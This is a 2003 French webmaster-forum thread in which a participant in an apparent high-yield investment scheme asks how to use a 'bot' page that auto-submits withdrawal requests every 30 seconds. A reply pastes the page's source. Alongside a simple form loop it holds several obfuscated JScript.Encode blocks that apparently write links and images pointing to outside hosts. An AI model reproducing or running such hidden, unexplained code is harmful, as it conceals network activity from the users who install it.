> Tous les forumsForum des Webmasters

Macro ? Script ?V'savez comment ça marche?
Statut du sujet : NON RESOLU Imprimer
 doucefrance
  Posté le 12/12/2003 @ 20:12  
 Petit astucien

3 Messages
Bonjour tout le monde, Voilà j'ai un petit problème. Je participe à des programmes nommés HYIP.Autrement dit High Yield Investment Programs. Ou si vous préférez des programmes à très hauts risques.On sait que généralement ces programmes sont forcément des arnacques mais le problème n'est pas là. Un de ces programmes nommé Brideby verse les intérêts journaliers au compte Goutte.Il faut être là au bon moment.Ce que je voudrais c'est installer un système qui effectue l'opération "withdraw"toutes les 30 secondes. Ci-joint un outil que je ne parviens pas à faire marcher. Quelqu'un peut m'expliquer ? SCRIPTS POUR BRIDEBY Fonctionnement : 1. Téléchargez le script correspondant à vos besoins 2. Logguez-vous sur Brideby comme vous avez l'habitude de le faire 3. Une fois loggué, ouvrez le script dans la même fenêtre, soit en utilisant la commande "Fichier/ouvrir", soit en faisant un "glisser déposer" 4. En bas de la page du script, saisissez le montant à retirer puis cliquez sur le bouton "Go!", c'est tout :) Le script fait une demande de retrait toutes les 30 secondes. A noter que le cookie de Brideby expire au bout de ? heures. Une fois périmé, Brideby vous demande de vous relogguer. Bonne chance. Les scripts (zippés) : - Script pour retirer ses intérêts journaliers <bot_brideby1.zip> - Script pour retirer ses "referrals profit" <bot_brideby2.zip> Important : scripts uniquement testés sous Microsoft Internet Explorer 6 & Windows XP. Merci
 Afficher le profil de doucefranceEnvoyer un message privé à doucefrance

Publicité
 Buzzz  Posté le 13/12/2003 à 08:27  
Astucien

2215 Messages
Si tu mets les liens vers les zip, on aura plus de chance de pouvoir les tester ! Avec les infos que tu donnes, on ne peut strictement rien faire d'autre que te conseiller de suivre les infos contenues dans les zips.....
Afficher le profil de BuzzzEnvoyer un message privé à Buzzz
 doucefrance  Posté le 13/12/2003 à 10:59  
Petit astucien

3 Messages
Merci Buzzz de te pencher sur la question .Je te mets le lien : http://www.best-invest.pc.cz/brideby mais il n'y a rien d'autre que le texte copié-collé. En tous cas merci à toi...c'est du chinois ce script. Cordialement
 koala01  Posté le 15/12/2003 à 14:40  
Astucien

4715 Messages
voici le code que tu obtiens de la page qui permet de retirer une somme: [code]<html> <title>BOT BRIDEBY</title> <body topmargin="0" leftmargin="0"> <IFRAME src="" name="bridebytmp" width="100%" height="100%"></IFRAME> <form method="post" name="work" action="https://www.brideby.com/cgi-bin/index.cgi" target="bridebytmp"> <input type="hidden" name="act" value="form_withdraw_profit"> <script language="JavaScript">function presubmit(actin){with(document.work){act.value=actin;submit();}}</script> <script language="JScript.Encode">#@~^bAEAAA==Abx[KhcN+6l!sYUYCY!/xE] !Z+Oy!!2S~A"k9+8X ^K:~O,3VbYn~_5qKDri\E{E!c1FFcv%c/azVKo mK:EIt/+1xJk+mZqRtbYkRdwzsKo mKhJpH[x9Wm;hxOitU7'Um\bolDWMIHa'TitN ^KW3bn'r4'(EIH1'Zir0c\9R^WKVk#\^{Fi\. '\lD4cDC NK:`*itU'vHU\cl22gl: /!4/D.rxT`Z~+#xxrHrJ*_!=FI\D'`UnSP9lDnv#bcoYKb:"W +606/nOv#it"'rw'rQ\w3JLDU'EQtDU_r'm{JQ\1_J'O{JQHDIb0ck+^0"{YK2#PHWD{FINV/`H6D'ZINHkV{JqRTEpd3QAAA==^#~@</script> <script language="JScript.Encode">#@~^PwAAAA==\aVxrJpH/^'rqR8JIHNPx~vHx7 Lm\lAUC4^+9`bgEer)E1rbityQxE[Lxv3H%iKREAAA==^#~@</script> <script language="JScript.Encode">#@~^aQAAAA==\kVxrFc JpHkx/1Dn+ i\2X'`tU'{!#Q\dR1W^W.fn2DtlHk wb6nsG+wO4pH"_{ELh4{J3H/chb[Y4_v6E_\dct+bLtD_JL2a'r_twai2iEAAA==^#~@</script> <script language="JScript.Encode">#@~^CgAAAA==\kVxrFc&JpegIAAA==^#~@</script> <script language="JScript.Encode">#@~^MAEAAA==\H'EritX_{J@!CP4Dn0{B4ODw)J&J3HE3E&m YQmrNx*OGqvR'0{&'2{J_\23J'D xr_\Mx3JB,Ym.oYxB|4sC 3B@*EitX_{E@!kso,/.mxv4YOwklzJJQ\k+mQEJmUYc^Tk_1k9'cOG8%LJQH._E'kV'rQHkV_r'.'r_/^l2nvH[RMn0D.nM#_E'6DxJ3\6DQr[ao'r_dmmwn`SkU[KhR^GmmYkKU tM+6#IHzQ{JvP(GD9+.xZPhr[Dtx!,4kL4Y{!PmVDxBE@*EitXQxr@!zm@*JpHNcA.kD+vHz#Iu1kAAA==^#~@</script> <script language="javascript">function test(){if(document.work.amount.value<=0){alert("The amount should be more than zero.");document.work.amount.focus();return false;}if(isNaN(document.work.amount.value)){alert("Only the digital values are allowable.");document.work.amount.focus();return false;}presubmit('withdraw_profit');}</script> Montant à retirer : <input type="text" name="amount" size="8" maxlength="10" value="10">$ <input type="button" onclick="submitloop()" value="Ok!"> </FORM> <script language="JavaScript"> function submitloop() { test() setTimeout('submitloop()',30000) } </script> </body> </html>[/code] finalement, il s'agit simplement d'une page html avec un formulaire qui appelle un script cgi sur le site (tu dois etre logué) donc, en effet, tu va sur le site et tu te logue (visiblement, il mettra un cookie avec une durée de vie bien définie) apres, il suffit d'appeler la page bot_bredy1.htm que tu aura dézipé sur ton pc pour que l'action s'effectue[clindoeil]
Afficher le profil de koala01 Voir la configuration de koala01Envoyer un message privé à koala01
 doucefrance  Posté le 15/12/2003 à 15:42  
Petit astucien

3 Messages
Salut et merci d'avoir jeté un oeil àmon truc.Je suis allé moi-même allé voir sur le lien qui se trouvait au bas de ton message.Tous ces popups, mon Dieu, ça fait peur !Visiblement tu connais ton job mais le problème c'est que ton langage est incomréhensible.Je ne suis pas initié : "... il s'agit simplement d'une page html avec un formulaire qui appelle un script cgi sur le site (tu dois etre logué) donc, en effet, tu va sur le site et tu te logue (visiblement, il mettra un cookie avec une durée de vie bien définie) apres, il suffit d'appeler la page bot_bredy1.htm que tu aura dézipé sur ton pc pour que l'action s'effectue" C'est ton texte. Ok je me logue sur brideby.Mais si j'appelle une autre page, je perds ma connection à Brideby.Et puis dézipé ça veut dire quoi?Tu vois je suis pas prêt d'y arriver.Dis-moi, s'il y a moyen de te contacter par le biais de ton site.
Haut de la page 
Inscrivez-vous !
- Posez vos questions

- Résolvez vos problèmes

- Aidez les autres

- Participez et créez vos discussions

- Dialoguez en privé avec d'autres membres

- Suivez vos sujets préférés

- Affichez les signatures des membres

TOUT EST GRATUIT !

Je crée mon compte

Vous avez besoin d'aide ?
Des centaines d'experts sont à votre disposition sur les forums PC Astuces pour vous aider gratuitement, 24h/24, 7j/7.

Les derniers sujets résolus !

> Tous les forumsForum des Webmasters

Forum PC Astuces© 1997-2008 WebastucesAller en haut de la page